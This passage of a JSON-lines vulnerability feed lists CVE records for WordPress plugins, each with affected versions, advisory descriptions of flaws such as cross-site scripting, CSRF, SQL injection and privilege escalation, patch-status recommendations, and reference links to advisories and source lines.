replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ab3e286-05db-430e-bbe7-bfaa31134c3c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ab3e286-05db-430e-bbe7-bfaa31134c3c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elegant-addons-for-elementor\\\/trunk\\\/widgets\\\/eae-switcher.php#L516\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elegant-addons-for-elementor\\\/trunk\\\/widgets\\\/eae-switcher.php#L516\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elegant-addons-for-elementor\\\/trunk\\\/widgets\\\/eae-slider.php#L1091\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elegant-addons-for-elementor\\\/trunk\\\/widgets\\\/eae-slider.php#L1091\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elegant-addons-for-elementor\\\/trunk\\\/widgets\\\/eae-iconbox.php#L1667\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elegant-addons-for-elementor\\\/trunk\\\/widgets\\\/eae-iconbox.php#L1667\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6405","slug":"floating-social-buttons","versionImpact":"1.5","description":"The Floating Social Buttons plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.5. This is due to missing or incorrect nonce validation on the floating_social_buttons_option() function. This makes it possible for unauthenticated attackers to update the plugin's settings and inject malicious web scripts via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/befe5e99-204e-470e-bbbb-285b5ba0b1fb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/befe5e99-204e-470e-bbbb-285b5ba0b1fb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/floating-social-buttons\\\/trunk\\\/floating-social-buttons.php#L230\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/floating-social-buttons\\\/trunk\\\/floating-social-buttons.php#L230\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4507","slug":"admission-appmanager","versionImpact":"1.0.0","description":"The Admission AppManager plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'q' parameter in versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/55367b9b-8ae1-4282-bf9f-8fb3848eb579?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/55367b9b-8ae1-4282-bf9f-8fb3848eb579?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/admission-appmanager\\\/trunk\\\/admin\\\/class-admission-app-manager-admin.php#L843\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/admission-appmanager\\\/trunk\\\/admin\\\/class-admission-app-manager-admin.php#L843\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9628","slug":"wps-telegram-chat","versionImpact":"4.6.0","description":"The WPS Telegram Chat plugin for WordPress is vulnerable to unauthorized modification of data and loss of data due to a missing capability check on the 'Wps_Telegram_Chat_Admin::check?onnection' function in versions up to, and including, 4.5.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to have full access to the Telegram Bot API endpoint and communicate with it.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c7f7e545-5e14-421e-90b4-bc54b23d0fe6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c7f7e545-5e14-421e-90b4-bc54b23d0fe6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wps-telegram-chat\\\/tags\\\/4.5.4\\\/admin\\\/class-wps-telegram-chat-admin.php#L176\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wps-telegram-chat\\\/tags\\\/4.5.4\\\/admin\\\/class-wps-telegram-chat-admin.php#L176\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11092","slug":"svgplus","versionImpact":"1.1.0","description":"The SVGPlus plugin for WordPress is vulnerable to Stored Cross-Site Scripting via REST API SVG File uploads in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/77e43062-1a3d-4db1-aeac-4d7505d18730?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/77e43062-1a3d-4db1-aeac-4d7505d18730?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/svgplus\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/svgplus\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11465","slug":"yikes-inc-easy-custom-woocommerce-product-tabs","versionImpact":"1.8.5","description":"The Custom Product Tabs for WooCommerce plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.8.5 via deserialization of untrusted input in the 'yikes_woo_products_tabs' post meta parameter. This makes it possible for authenticated attackers, with Shop Manager-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yikes-inc-easy-custom-woocommerce-product-tabs\\\/trunk\\\/admin\\\/class.yikes-woo-generate-html.php#L19\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yikes-inc-easy-custom-woocommerce-product-tabs\\\/trunk\\\/admin\\\/class.yikes-woo-generate-html.php#L19\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yikes-inc-easy-custom-woocommerce-product-tabs\\\/trunk\\\/admin\\\/class.yikes-woo-saved-tabs.php#L222\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yikes-inc-easy-custom-woocommerce-product-tabs\\\/trunk\\\/admin\\\/class.yikes-woo-saved-tabs.php#L222\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yikes-inc-easy-custom-woocommerce-product-tabs\\\/trunk\\\/admin\\\/class.yikes-woo-saved-tabs.php#L449\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yikes-inc-easy-custom-woocommerce-product-tabs\\\/trunk\\\/admin\\\/class.yikes-woo-saved-tabs.php#L449\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yikes-inc-easy-custom-woocommerce-product-tabs\\\/trunk\\\/public\\\/class.yikes-woo-tabs-display.php#L47\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yikes-inc-easy-custom-woocommerce-product-tabs\\\/trunk\\\/public\\\/class.yikes-woo-tabs-display.php#L47\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yikes-inc-easy-custom-woocommerce-product-tabs\\\/trunk\\\/yikes-inc-easy-custom-woocommerce-product-tabs.php#L262\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yikes-inc-easy-custom-woocommerce-product-tabs\\\/trunk\\\/yikes-inc-easy-custom-woocommerce-product-tabs.php#L262\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ad0d6eb-aafa-4f0b-bf1c-73d94e361087?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ad0d6eb-aafa-4f0b-bf1c-73d94e361087?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13676","slug":"categorized-gallery","versionImpact":"2.0","description":"The Categorized Gallery Plugin plugin for WordPress is vulnerable to SQL Injection via the 'field' attribute of the 'image_gallery' shortcode in all versions up to, and including, 2.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/categorized-gallery\\\/trunk\\\/init.php#L177\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/categorized-gallery\\\/trunk\\\/init.php#L177\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b409ef44-18fa-4ea0-90a4-69e03fa0116e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b409ef44-18fa-4ea0-90a4-69e03fa0116e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13835","slug":"post-meta-data-manager","versionImpact":"1.4.3","description":"The Post Meta Data Manager plugin for WordPress is vulnerable to multisite privilege escalation in all versions up to, and including, 1.4.3. This is due to the plugin not properly verifying the existence of a multisite installation prior to allowing user meta to be added\/modified. This makes it possible for authenticated attackers, with Administrator-level access and above, to gain elevated privileges on subsites that would otherwise be inaccessible.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/post-meta-data-manager\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/post-meta-data-manager\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/568aa6d6-10a1-4653-ab95-845faf005b8e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/568aa6d6-10a1-4653-ab95-845faf005b8e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4590","slug":"daisycon","versionImpact":"4.8.4","description":"The Daisycon prijsvergelijkers plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'daisycon_uitvaart' shortcode in all versions up to, and including, 4.8.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/daisycon\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/daisycon\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/74551e01-063c-4493-8472-9c0903ac17c5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/74551e01-063c-4493-8472-9c0903ac17c5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5953","slug":"hrm","versionImpact":"2.2.17","description":"The WP Human Resource Management plugin for WordPress is vulnerable to Privilege Escalation due to missing authorization in the ajax_insert_employee() and update_empoyee() functions in versions 2.0.0 through 2.2.17. The AJAX handler reads the client-supplied $_POST['role'] and, after basic cleaning via hrm_clean(), passes it directly to wp_insert_user() and later to $user->set_role() without verifying that the current user is allowed to assign that role. This makes it possible for authenticated attackers, with Employee-level access and above, to elevate their privileges to administrator.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hrm\\\/tags\\\/2.2.17\\\/class\\\/employee.php#L543\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hrm\\\/tags\\\/2.2.17\\\/class\\\/employee.php#L543\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hrm\\\/tags\\\/2.2.17\\\/class\\\/employee.php#L591\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hrm\\\/tags\\\/2.2.17\\\/class\\\/employee.php#L591\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hrm\\\/tags\\\/2.2.17\\\/class\\\/employee.php#L89\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hrm\\\/tags\\\/2.2.17\\\/class\\\/employee.php#L89\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/hrm\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/hrm\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ba33a18-429f-4a3e-b018-bdfbbe6e8482?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ba33a18-429f-4a3e-b018-bdfbbe6e8482?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8212","slug":"medical-addon-for-elementor","versionImpact":"1.6.3","description":"The Medical Addon for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Typewriter widget in all versions up to, and including, 1.6.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/medical-addon-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/medical-addon-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9dc5452d-41e4-4b28-bb89-fe5ef9c10cb7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9dc5452d-41e4-4b28-bb89-fe5ef9c10cb7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4808","slug":"wp-post-modal","versionImpact":"3.7.3","description":"The WP Post Popup WordPress plugin through 3.7.3 does not sanitise and escape some of its inputs, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bb8e9f06-477b-4da3-b5a6-4f06084ecd57\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bb8e9f06-477b-4da3-b5a6-4f06084ecd57\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0656","slug":"password-protected","versionImpact":"2.6.6","description":"The Password Protected \u2013 Ultimate Plugin to Password Protect Your WordPress Content with Ease plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Google Captcha Site Key in all versions up to, and including, 2.6.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aba36c3b-beae-4c47-8aa8-5012a7a838ce?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aba36c3b-beae-4c47-8aa8-5012a7a838ce?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3034934%40password-protected&new=3034934%40password-protected&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3034934%40password-protected&new=3034934%40password-protected&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4971","slug":"learnpress","versionImpact":"4.2.6.6","description":"The LearnPress \u2013 WordPress LMS Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018id\u2019 parameter in all versions up to, and including, 4.2.6.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/10b08a05-3561-4d05-985b-6a2339a547a7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/10b08a05-3561-4d05-985b-6a2339a547a7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/learnpress\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/learnpress\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11085","slug":"wp-log-viewer","versionImpact":"1.2.1","description":"The WP Log Viewer plugin for WordPress is vulnerable to unauthorized use of functionality due to a missing capability check on several AJAX actions in all versions up to, and including, 1.2.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to access logs, update plugin-related user settings and general plugin settings.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e27bd526-1a5f-4628-8bb2-1741496f897f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e27bd526-1a5f-4628-8bb2-1741496f897f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-log-viewer\\\/trunk\\\/libs\\\/Ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-log-viewer\\\/trunk\\\/libs\\\/Ajax.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12062","slug":"charity-addon-for-elementor","versionImpact":"1.3.3","description":"The Charity Addon for Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.3.2 via the 'nacharity_elementor_template' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created by Elementor that they should not have access to.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/charity-addon-for-elementor\\\/trunk\\\/elementor\\\/lib\\\/lib.php#L12\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/charity-addon-for-elementor\\\/trunk\\\/elementor\\\/lib\\\/lib.php#L12\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ac68314-c704-4273-addc-4bc623659769?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ac68314-c704-4273-addc-4bc623659769?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11755","slug":"ims-countdown","versionImpact":"1.3.4","description":"The IMS Countdown plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Countdown post settings in all versions up to, and including, 1.3.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ims-countdown\\\/trunk\\\/shortcode\\\/shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ims-countdown\\\/trunk\\\/shortcode\\\/shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2de22728-4f67-406c-9db5-33cbba4c15eb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2de22728-4f67-406c-9db5-33cbba4c15eb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11445","slug":"image-magnify","versionImpact":"1.1","description":"The Image Magnify plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'image_magnify' shortcode in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-magnify\\\/trunk\\\/image-magnify.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-magnify\\\/trunk\\\/image-magnify.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/image-magnify\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/image-magnify\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/55838de5-0795-429b-be87-a0d57b29e471?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/55838de5-0795-429b-be87-a0d57b29e471?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13433","slug":"utilities-for-mtg","versionImpact":"1.4.1","description":"The Utilities for MTG plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'mtglink' shortcode in all versions up to, and including, 1.4.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/utilities-for-mtg\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/utilities-for-mtg\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fe82b7ee-d09b-4eeb-a7d6-914b8b24368b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fe82b7ee-d09b-4eeb-a7d6-914b8b24368b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13674","slug":"cosmic-blocks","versionImpact":"1.3.0","description":"The Cosmic Blocks (40+) Content Editor Blocks Collection plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'cwp_social_share' shortcode in all versions up to, and including, 1.3.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cosmic-blocks\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cosmic-blocks\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5cccd266-48a8-481e-8fbd-db5a9a72f55a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5cccd266-48a8-481e-8fbd-db5a9a72f55a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13569","slug":"front-end-only-users","versionImpact":"3.2.32","description":"The Front End Users WordPress plugin through 3.2.32 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b9742440-0e36-4900-b58e-41c9854a62b2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b9742440-0e36-4900-b58e-41c9854a62b2\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4103","slug":"wp-geometa","description":"The WP-GeoMeta plugin for WordPress is vulnerable to Privilege Escalation due to a missing capability check on the wp_ajax_wpgm_start_geojson_import() function in versions 0.3.4 to 0.3.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to elevate their privileges to that of an administrator.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-geometa\\\/tags\\\/0.3.4\\\/lib\\\/wp-geometa-dash.php#L896\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-geometa\\\/tags\\\/0.3.4\\\/lib\\\/wp-geometa-dash.php#L896\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-geometa\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-geometa\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/43039f2a-b3f9-4836-8b55-e8a091b1a102?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/43039f2a-b3f9-4836-8b55-e8a091b1a102?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5933","slug":"rd-wapp","versionImpact":"1.4","description":"The RD Contacto plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.4. This is due to missing or incorrect nonce validation on the rdWappUpdateData() function. This makes it possible for unauthenticated attackers to update plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a 